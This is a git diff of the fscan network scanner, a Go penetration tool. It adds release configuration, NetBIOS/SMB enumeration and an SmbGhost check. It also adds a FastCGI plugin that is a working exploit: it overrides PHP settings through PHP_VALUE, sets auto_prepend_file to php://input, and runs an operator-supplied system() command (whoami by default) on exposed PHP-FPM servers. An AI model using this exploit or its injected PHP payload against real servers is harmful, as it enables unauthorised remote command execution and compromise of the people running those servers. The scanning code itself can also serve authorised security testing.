加入手工gc回收,尝试节省无用内存。

-url 支持逗号隔开。修复一个poc模块bug。
update README.md
2026-02-14 12:49:18 +08:00 · 2022-07-06 21:42:00 +08:00 · 2022-07-05 12:59:23 +08:00 · 2022-07-05 12:50:28 +08:00 · 2022-07-05 12:49:04 +08:00 · 2022-07-03 23:53:47 +08:00
406 changed files with 26679 additions and 16444 deletions
--- a/.github/conf/.goreleaser.yml
+++ b/.github/conf/.goreleaser.yml
@@ -0,0 +1,73 @@
+before:
+  hooks:
+    - go mod tidy
+    - go generate ./...
+builds:
+  - id: "with-upx"
+    env:
+      - CGO_ENABLED=0
+    goos:
+      - linux
+      - windows
+      - darwin
+    goarch:
+      - amd64
+      - arm64
+      - arm
+      - "386"
+    goarm:
+      - "6"
+      - "7"
+    flags:
+      - -trimpath
+    ldflags:
+      - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
+    ignore:
+      - goos: windows
+        goarch: arm64
+      - goos: windows
+        goarch: arm
+      - goos: linux
+        goarch: mips64
+    hooks:
+       post: upx --best -f -q "{{ .Path }}"
+
+# UnknownExecutableFormatException
+# CantPackException: can't pack new-exe
+  - id: "without-upx"
+    env:
+      - CGO_ENABLED=0
+    goos:
+      - linux
+      - windows
+    goarch:
+      - mips64
+      - arm
+    goarm:
+      - "6"
+      - "7"
+    flags:
+      - -trimpath
+    ldflags:
+      - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
+    ignore:
+      - goos: linux
+        goarch: arm
+
+archives:
+  - replacements:
+      darwin: Darwin
+      linux: Linux
+      windows: Windows
+      386: i386
+      amd64: x86_64
+checksum:
+  name_template: 'checksums.txt'
+snapshot:
+  name_template: "{{ incpatch .Version }}-next"
+changelog:
+  sort: asc
+  filters:
+    exclude:
+      - '^docs:'
+      - '^test:'
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -0,0 +1,35 @@
+name: goreleaser
+
+on:
+  push:
+    tags:
+      - '*'
+
+permissions:
+  contents: write
+
+jobs:
+  goreleaser:
+    runs-on: ubuntu-latest
+    timeout-minutes: 60
+    steps:
+      -
+        name: Checkout
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0
+      -
+        name: Set up Go
+        uses: actions/setup-go@v2
+        with:
+          go-version: 1.17
+      -
+        name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v2
+        with:
+          distribution: goreleaser
+          version: latest
+          args: -f .github/conf/.goreleaser.yml
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
--- a/LICENSE.txt
+++ b/LICENSE.txt
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 shadow1ng
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -3,7 +3,6 @@ package Plugins
 import (
 	"bytes"
 	"fmt"
-	"net"
 	"time"

 	"github.com/shadow1ng/fscan/common"
@@ -96,14 +95,22 @@ const (
 )

 func SmbGhost(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
 	err := SmbGhostScan(info)
 	return err
 }

 func SmbGhostScan(info *common.HostInfo) error {
-	ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
-	addr := fmt.Sprintf("%s:%d", info.Host, port)
-	conn, err := net.DialTimeout("tcp", addr, timeout)
+	ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
+	addr := fmt.Sprintf("%s:%v", info.Host, port)
+	conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
@@ -117,9 +124,8 @@ func SmbGhostScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	if bytes.Contains(buff[:n], []byte("Public")) == true {
-		result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
+		result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
 		common.LogSuccess(result)

 	}
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -0,0 +1,289 @@
+package Plugins
+
+import (
+	"bytes"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"net"
+	"strconv"
+	"strings"
+	"time"
+)
+
+var (
+	UNIQUE_NAMES = map[string]string{
+		"\x00": "Workstation Service",
+		"\x03": "Messenger Service",
+		"\x06": "RAS Server Service",
+		"\x1F": "NetDDE Service",
+		"\x20": "Server Service",
+		"\x21": "RAS Client Service",
+		"\xBE": "Network Monitor Agent",
+		"\xBF": "Network Monitor Application",
+		"\x1D": "Master Browser",
+		"\x1B": "Domain Master Browser",
+	}
+
+	GROUP_NAMES = map[string]string{
+		"\x00": "Domain Name",
+		"\x1C": "Domain Controllers",
+		"\x1E": "Browser Service Elections",
+	}
+
+	NetBIOS_ITEM_TYPE = map[string]string{
+		"\x01\x00": "NetBIOS computer name",
+		"\x02\x00": "NetBIOS domain name",
+		"\x03\x00": "DNS computer name",
+		"\x04\x00": "DNS domain name",
+		"\x05\x00": "DNS tree name",
+		"\x07\x00": "Time stamp",
+	}
+)
+
+type NbnsName struct {
+	unique    string
+	group     string
+	msg       string
+	osversion string
+}
+
+func NetBIOS(info *common.HostInfo) error {
+	nbname, err := NetBIOS1(info)
+	var msg, isdc string
+
+	if strings.Contains(nbname.msg, "Domain Controllers") {
+		isdc = "[+]DC"
+	}
+	msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s   %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
+
+	if common.Scantype == "netbios" {
+		msg += "\n-------------------------------------------\n" + nbname.msg
+	}
+	if len(nbname.group) > 0 || len(nbname.unique) > 0 {
+		common.LogSuccess(msg)
+	}
+	return err
+}
+
+func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
+	nbname, err = GetNbnsname(info)
+	var payload0 []byte
+	if err == nil {
+		name := netbiosEncode(nbname.unique)
+		payload0 = append(payload0, []byte("\x81\x00\x00D ")...)
+		payload0 = append(payload0, name...)
+		payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
+	}
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return
+	}
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+	if err != nil {
+		return
+	}
+
+	if info.Ports == "139" && len(payload0) > 0 {
+		_, err1 := conn.Write(payload0)
+		if err1 != nil {
+			return
+		}
+		_, err1 = readbytes(conn)
+		if err1 != nil {
+			return
+		}
+	}
+
+	payload1 := []byte("\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00")
+	payload2 := []byte("\x00\x00\x01\x0a\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x0c\xff\x00\x0a\x01\x04\x41\x32\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xcf\x00\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\xce\x0e\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x33\x00\x37\x00\x39\x00\x30\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x32\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x35\x00\x2e\x00\x32\x00\x00\x00\x00\x00")
+	_, err = conn.Write(payload1)
+	if err != nil {
+		return
+	}
+	_, err = readbytes(conn)
+	if err != nil {
+		return
+	}
+
+	_, err = conn.Write(payload2)
+	if err != nil {
+		return
+	}
+	ret, err := readbytes(conn)
+	if err != nil || len(ret) < 45 {
+		return
+	}
+
+	num1, err := bytetoint(ret[43:44][0])
+	if err != nil {
+		return
+	}
+	num2, err := bytetoint(ret[44:45][0])
+	if err != nil {
+		return
+	}
+	length := num1 + num2*256
+	if len(ret) < 48+length {
+		return
+	}
+	os_version := ret[47+length:]
+	tmp1 := bytes.ReplaceAll(os_version, []byte{0x00, 0x00}, []byte{124})
+	tmp1 = bytes.ReplaceAll(tmp1, []byte{0x00}, []byte{})
+	msg1 := string(tmp1[:len(tmp1)-1])
+	nbname.osversion = msg1
+	index1 := strings.Index(msg1, "|")
+	if index1 > 0 {
+		nbname.osversion = nbname.osversion[:index1]
+	}
+	nbname.msg += "-------------------------------------------\n"
+	nbname.msg += msg1 + "\n"
+	start := bytes.Index(ret, []byte("NTLMSSP"))
+	if len(ret) < start+45 {
+		return
+	}
+	num1, err = bytetoint(ret[start+40 : start+41][0])
+	if err != nil {
+		return
+	}
+	num2, err = bytetoint(ret[start+41 : start+42][0])
+	if err != nil {
+		return
+	}
+	length = num1 + num2*256
+	num1, err = bytetoint(ret[start+44 : start+45][0])
+	if err != nil {
+		return
+	}
+	offset, err := bytetoint(ret[start+44 : start+45][0])
+	if err != nil || len(ret) < start+offset+length {
+		return
+	}
+	index := start + offset
+	for index < start+offset+length {
+		item_type := ret[index : index+2]
+		num1, err = bytetoint(ret[index+2 : index+3][0])
+		if err != nil {
+			return
+		}
+		num2, err = bytetoint(ret[index+3 : index+4][0])
+		if err != nil {
+			return
+		}
+		item_length := num1 + num2*256
+		item_content := bytes.ReplaceAll(ret[index+4:index+4+item_length], []byte{0x00}, []byte{})
+		index += 4 + item_length
+		if string(item_type) == "\x07\x00" {
+			//Time stamp, 暂时不想处理
+		} else if NetBIOS_ITEM_TYPE[string(item_type)] != "" {
+			nbname.msg += fmt.Sprintf("%-22s: %s\n", NetBIOS_ITEM_TYPE[string(item_type)], string(item_content))
+		} else if string(item_type) == "\x00\x00" {
+			break
+		} else {
+			nbname.msg += fmt.Sprintf("Unknown: %s\n", string(item_content))
+		}
+	}
+	return nbname, err
+}
+
+func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
+	senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
+	realhost := fmt.Sprintf("%s:%v", info.Host, 137)
+	conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return
+	}
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+	if err != nil {
+		return
+	}
+	_, err = conn.Write(senddata1)
+	if err != nil {
+		return
+	}
+	text, err := readbytes(conn)
+	if err != nil {
+		return
+	}
+	if len(text) < 57 {
+		return nbname, fmt.Errorf("no names available")
+	}
+	num, err := bytetoint(text[56:57][0])
+	if err != nil {
+		return
+	}
+	data := text[57:]
+	var msg string
+	for i := 0; i < num; i++ {
+		if len(data) < 18*i+16 {
+			break
+		}
+		name := string(data[18*i : 18*i+15])
+		flag_bit := data[18*i+15 : 18*i+16]
+		if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
+			msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
+		} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
+			msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
+		} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
+			name_flags := data[18*i+16 : 18*i+18][0]
+			if name_flags >= 128 {
+				nbname.group = strings.Replace(name, " ", "", -1)
+				msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
+			} else {
+				nbname.unique = strings.Replace(name, " ", "", -1)
+				msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
+			}
+		} else {
+			msg += fmt.Sprintf("%s \n", name)
+		}
+	}
+	nbname.msg += msg
+	return
+}
+
+func readbytes(conn net.Conn) (result []byte, err error) {
+	buf := make([]byte, 4096)
+	for {
+		count, err := conn.Read(buf)
+		if err != nil {
+			break
+		}
+		result = append(result, buf[0:count]...)
+		if count < 4096 {
+			break
+		}
+	}
+	return result, err
+}
+
+func bytetoint(text byte) (int, error) {
+	num1 := fmt.Sprintf("%v", text)
+	num, err := strconv.Atoi(num1)
+	return num, err
+}
+
+func netbiosEncode(name string) (output []byte) {
+	var names []int
+	src := fmt.Sprintf("%-16s", name)
+	for _, a := range src {
+		char_ord := int(a)
+		high_4_bits := char_ord >> 4
+		low_4_bits := char_ord & 0x0f
+		names = append(names, high_4_bits, low_4_bits)
+	}
+	for _, one := range names {
+		out := (one + 0x41)
+		output = append(output, byte(out))
+	}
+	return
+}
--- a/Plugins/base.go
+++ b/Plugins/base.go
@@ -1,18 +1,22 @@
 package Plugins

 var PluginList = map[string]interface{}{
-	"21": FtpScan,
-	"22": SshScan,
-	"135": Findnet,
-	"445": SmbScan,
-	"1433":MssqlScan,
-	"3306": MysqlScan,
-	"5432": PostgresScan,
-	"6379": RedisScan,
-	"9200":elasticsearchScan,
-	"11211":MemcachedScan,
-	"27017":MongodbScan,
-	"1000001": MS17010,
-	"1000002": SmbGhost,
-	"1000003":WebTitle,
+	"21":       FtpScan,
+	"22":       SshScan,
+	"135":      Findnet,
+	"139":      NetBIOS,
+	"445":      SmbScan,
+	"1433":     MssqlScan,
+	"1521":     OracleScan,
+	"3306":     MysqlScan,
+	"3389":     RdpScan,
+	"5432":     PostgresScan,
+	"6379":     RedisScan,
+	"9000":     FcgiScan,
+	"11211":    MemcachedScan,
+	"27017":    MongodbScan,
+	"1000001":  MS17010,
+	"1000002":  SmbGhost,
+	"1000003":  WebTitle,
+	"10000031": WebTitle,
 }
--- a/Plugins/elasticsearch.go
+++ b/Plugins/elasticsearch.go
@@ -1,57 +0,0 @@
-package Plugins
-
-import (
-	"crypto/tls"
-	"fmt"
-	"io/ioutil"
-	"net"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-)
-
-func elasticsearchScan(info *common.HostInfo) error {
-	_, err := geturl2(info)
-	return err
-}
-
-func geturl2(info *common.HostInfo) (flag bool, err error) {
-	flag = false
-	url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
-	var client = &http.Client{
-		Timeout: time.Duration(info.WebTimeout) * time.Second,
-		Transport: &http.Transport{
-			TLSClientConfig:   &tls.Config{InsecureSkipVerify: true},
-			DisableKeepAlives: false,
-			DialContext: (&net.Dialer{
-				Timeout: time.Duration(info.WebTimeout) * time.Second,
-			}).DialContext,
-		},
-		CheckRedirect: func(req *http.Request, via []*http.Request) error {
-			return http.ErrUseLastResponse
-		},
-	}
-
-	res, err := http.NewRequest("GET", url, nil)
-	if err == nil {
-		res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-		res.Header.Add("Accept", "*/*")
-		res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
-		res.Header.Add("Accept-Encoding", "gzip, deflate")
-		res.Header.Add("Connection", "close")
-		resp, err := client.Do(res)
-
-		if err == nil {
-			defer resp.Body.Close()
-			body, _ := ioutil.ReadAll(resp.Body)
-			if strings.Contains(string(body), "/_cat/master") {
-				result := fmt.Sprintf("Elastic:%s unauthorized", url)
-				common.LogSuccess(result)
-				flag = true
-			}
-		}
-	}
-	return flag, err
-}
--- a/Plugins/fcgiscan.go
+++ b/Plugins/fcgiscan.go
@@ -0,0 +1,372 @@
+package Plugins
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/binary"
+	"errors"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"io"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+)
+
+//links
+//https://xz.aliyun.com/t/9544
+//https://github.com/wofeiwo/webcgi-exploits
+
+func FcgiScan(info *common.HostInfo) {
+	if common.IsBrute {
+		return
+	}
+	url := "/etc/issue"
+	if common.Path != "" {
+		url = common.Path
+	}
+	addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
+	var reqParams string
+	var cutLine = "-----ASDGTasdkk361363s-----\n"
+	switch {
+	case common.Command == "read":
+		reqParams = ""
+	case common.Command != "":
+		reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
+	default:
+		reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
+	}
+
+	env := make(map[string]string)
+
+	env["SCRIPT_FILENAME"] = url
+	env["DOCUMENT_ROOT"] = "/"
+	env["SERVER_SOFTWARE"] = "go / fcgiclient "
+	env["REMOTE_ADDR"] = "127.0.0.1"
+	env["SERVER_PROTOCOL"] = "HTTP/1.1"
+
+	if len(reqParams) != 0 {
+		env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
+		env["REQUEST_METHOD"] = "POST"
+		env["PHP_VALUE"] = "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"
+	} else {
+		env["REQUEST_METHOD"] = "GET"
+	}
+
+	fcgi, err := New(addr, common.Timeout)
+	defer func() {
+		if fcgi.rwc != nil {
+			fcgi.rwc.Close()
+		}
+	}()
+	if err != nil {
+		errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
+		common.LogError(errlog)
+		return
+	}
+
+	stdout, stderr, err := fcgi.Request(env, reqParams)
+	if err != nil {
+		errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
+		common.LogError(errlog)
+		return
+	}
+
+	//1
+	//Content-type: text/html
+	//
+	//uid=1001(www) gid=1001(www) groups=1001(www)
+
+	//2
+	//Status: 404 Not Found
+	//Content-type: text/html
+	//
+	//File not found.
+	//Primary script unknown
+
+	//3
+	//Status: 403 Forbidden
+	//Content-type: text/html
+	//
+	//Access denied.
+	//Access to the script '/etc/passwd' has been denied (see security.limit_extensions)
+	var result string
+	var output = string(stdout)
+	if strings.Contains(string(stdout), cutLine) { //命令成功回显
+		output = strings.SplitN(string(stdout), cutLine, 2)[0]
+		if len(stderr) > 0 {
+			result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr))
+		} else {
+			result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, output)
+		}
+		common.LogSuccess(result)
+	} else if strings.Contains(string(stdout), "File not found") || strings.Contains(string(stdout), "Content-type") || strings.Contains(string(stdout), "Status") {
+		if len(stderr) > 0 {
+			result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, string(stdout), string(stderr))
+		} else {
+			result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, string(stdout))
+		}
+		common.LogSuccess(result)
+	}
+}
+
+// for padding so we don't have to allocate all the time
+// not synchronized because we don't care what the contents are
+var pad [maxPad]byte
+
+const (
+	FCGI_BEGIN_REQUEST uint8 = iota + 1
+	FCGI_ABORT_REQUEST
+	FCGI_END_REQUEST
+	FCGI_PARAMS
+	FCGI_STDIN
+	FCGI_STDOUT
+	FCGI_STDERR
+)
+
+const (
+	FCGI_RESPONDER uint8 = iota + 1
+)
+
+const (
+	maxWrite = 6553500 // maximum record body
+	maxPad   = 255
+)
+
+type header struct {
+	Version       uint8
+	Type          uint8
+	Id            uint16
+	ContentLength uint16
+	PaddingLength uint8
+	Reserved      uint8
+}
+
+func (h *header) init(recType uint8, reqId uint16, contentLength int) {
+	h.Version = 1
+	h.Type = recType
+	h.Id = reqId
+	h.ContentLength = uint16(contentLength)
+	h.PaddingLength = uint8(-contentLength & 7)
+}
+
+type record struct {
+	h   header
+	buf [maxWrite + maxPad]byte
+}
+
+func (rec *record) read(r io.Reader) (err error) {
+	if err = binary.Read(r, binary.BigEndian, &rec.h); err != nil {
+		return err
+	}
+	if rec.h.Version != 1 {
+		return errors.New("fcgi: invalid header version")
+	}
+	n := int(rec.h.ContentLength) + int(rec.h.PaddingLength)
+	if _, err = io.ReadFull(r, rec.buf[:n]); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (r *record) content() []byte {
+	return r.buf[:r.h.ContentLength]
+}
+
+type FCGIClient struct {
+	mutex     sync.Mutex
+	rwc       io.ReadWriteCloser
+	h         header
+	buf       bytes.Buffer
+	keepAlive bool
+}
+
+func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
+	conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
+	fcgi = &FCGIClient{
+		rwc:       conn,
+		keepAlive: false,
+	}
+	return
+}
+
+func (this *FCGIClient) writeRecord(recType uint8, reqId uint16, content []byte) (err error) {
+	this.mutex.Lock()
+	defer this.mutex.Unlock()
+	this.buf.Reset()
+	this.h.init(recType, reqId, len(content))
+	if err := binary.Write(&this.buf, binary.BigEndian, this.h); err != nil {
+		return err
+	}
+	if _, err := this.buf.Write(content); err != nil {
+		return err
+	}
+	if _, err := this.buf.Write(pad[:this.h.PaddingLength]); err != nil {
+		return err
+	}
+	_, err = this.rwc.Write(this.buf.Bytes())
+	return err
+}
+
+func (this *FCGIClient) writeBeginRequest(reqId uint16, role uint16, flags uint8) error {
+	b := [8]byte{byte(role >> 8), byte(role), flags}
+	return this.writeRecord(FCGI_BEGIN_REQUEST, reqId, b[:])
+}
+
+func (this *FCGIClient) writeEndRequest(reqId uint16, appStatus int, protocolStatus uint8) error {
+	b := make([]byte, 8)
+	binary.BigEndian.PutUint32(b, uint32(appStatus))
+	b[4] = protocolStatus
+	return this.writeRecord(FCGI_END_REQUEST, reqId, b)
+}
+
+func (this *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]string) error {
+	w := newWriter(this, recType, reqId)
+	b := make([]byte, 8)
+	for k, v := range pairs {
+		n := encodeSize(b, uint32(len(k)))
+		n += encodeSize(b[n:], uint32(len(v)))
+		if _, err := w.Write(b[:n]); err != nil {
+			return err
+		}
+		if _, err := w.WriteString(k); err != nil {
+			return err
+		}
+		if _, err := w.WriteString(v); err != nil {
+			return err
+		}
+	}
+	w.Close()
+	return nil
+}
+
+func readSize(s []byte) (uint32, int) {
+	if len(s) == 0 {
+		return 0, 0
+	}
+	size, n := uint32(s[0]), 1
+	if size&(1<<7) != 0 {
+		if len(s) < 4 {
+			return 0, 0
+		}
+		n = 4
+		size = binary.BigEndian.Uint32(s)
+		size &^= 1 << 31
+	}
+	return size, n
+}
+
+func readString(s []byte, size uint32) string {
+	if size > uint32(len(s)) {
+		return ""
+	}
+	return string(s[:size])
+}
+
+func encodeSize(b []byte, size uint32) int {
+	if size > 127 {
+		size |= 1 << 31
+		binary.BigEndian.PutUint32(b, size)
+		return 4
+	}
+	b[0] = byte(size)
+	return 1
+}
+
+// bufWriter encapsulates bufio.Writer but also closes the underlying stream when
+// Closed.
+type bufWriter struct {
+	closer io.Closer
+	*bufio.Writer
+}
+
+func (w *bufWriter) Close() error {
+	if err := w.Writer.Flush(); err != nil {
+		w.closer.Close()
+		return err
+	}
+	return w.closer.Close()
+}
+
+func newWriter(c *FCGIClient, recType uint8, reqId uint16) *bufWriter {
+	s := &streamWriter{c: c, recType: recType, reqId: reqId}
+	w := bufio.NewWriterSize(s, maxWrite)
+	return &bufWriter{s, w}
+}
+
+// streamWriter abstracts out the separation of a stream into discrete records.
+// It only writes maxWrite bytes at a time.
+type streamWriter struct {
+	c       *FCGIClient
+	recType uint8
+	reqId   uint16
+}
+
+func (w *streamWriter) Write(p []byte) (int, error) {
+	nn := 0
+	for len(p) > 0 {
+		n := len(p)
+		if n > maxWrite {
+			n = maxWrite
+		}
+		if err := w.c.writeRecord(w.recType, w.reqId, p[:n]); err != nil {
+			return nn, err
+		}
+		nn += n
+		p = p[n:]
+	}
+	return nn, nil
+}
+
+func (w *streamWriter) Close() error {
+	// send empty record to close the stream
+	return w.c.writeRecord(w.recType, w.reqId, nil)
+}
+
+func (this *FCGIClient) Request(env map[string]string, reqStr string) (retout []byte, reterr []byte, err error) {
+
+	var reqId uint16 = 1
+	defer this.rwc.Close()
+
+	err = this.writeBeginRequest(reqId, uint16(FCGI_RESPONDER), 0)
+	if err != nil {
+		return
+	}
+	err = this.writePairs(FCGI_PARAMS, reqId, env)
+	if err != nil {
+		return
+	}
+	if len(reqStr) > 0 {
+		err = this.writeRecord(FCGI_STDIN, reqId, []byte(reqStr))
+		if err != nil {
+			return
+		}
+	}
+
+	rec := &record{}
+	var err1 error
+
+	// recive untill EOF or FCGI_END_REQUEST
+	for {
+		err1 = rec.read(this.rwc)
+		if err1 != nil {
+			if err1 != io.EOF {
+				err = err1
+			}
+			break
+		}
+		switch {
+		case rec.h.Type == FCGI_STDOUT:
+			retout = append(retout, rec.content()...)
+		case rec.h.Type == FCGI_STDERR:
+			reterr = append(reterr, rec.content()...)
+		case rec.h.Type == FCGI_END_REQUEST:
+			fallthrough
+		default:
+			break
+		}
+	}
+
+	return
+}
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -5,7 +5,6 @@ import (
 	"encoding/hex"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"net"
 	"strings"
 	"time"
 )
@@ -22,16 +21,20 @@ func Findnet(info *common.HostInfo) error {
 }

 func FindnetScan(info *common.HostInfo) error {
-	realhost := fmt.Sprintf("%s:%d", info.Host, 135)
-	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	realhost := fmt.Sprintf("%s:%v", info.Host, 135)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	_, err = conn.Write(bufferV1)
 	if err != nil {
 		return err
@@ -67,7 +70,7 @@ func read(text []byte, host string) error {
 	encodedStr := hex.EncodeToString(text)
 	hostnames := strings.Replace(encodedStr, "0700", "", -1)
 	hostname := strings.Split(hostnames, "000000")
-	result := "NetInfo:\n[*]" + host
+	result := "[+] NetInfo:\n[*]" + host
 	for i := 0; i < len(hostname); i++ {
 		hostname[i] = strings.Replace(hostname[i], "00", "", -1)
 		host, err := hex.DecodeString(hostname[i])
--- a/Plugins/ftp.go
+++ b/Plugins/ftp.go
@@ -9,6 +9,22 @@ import (
 )

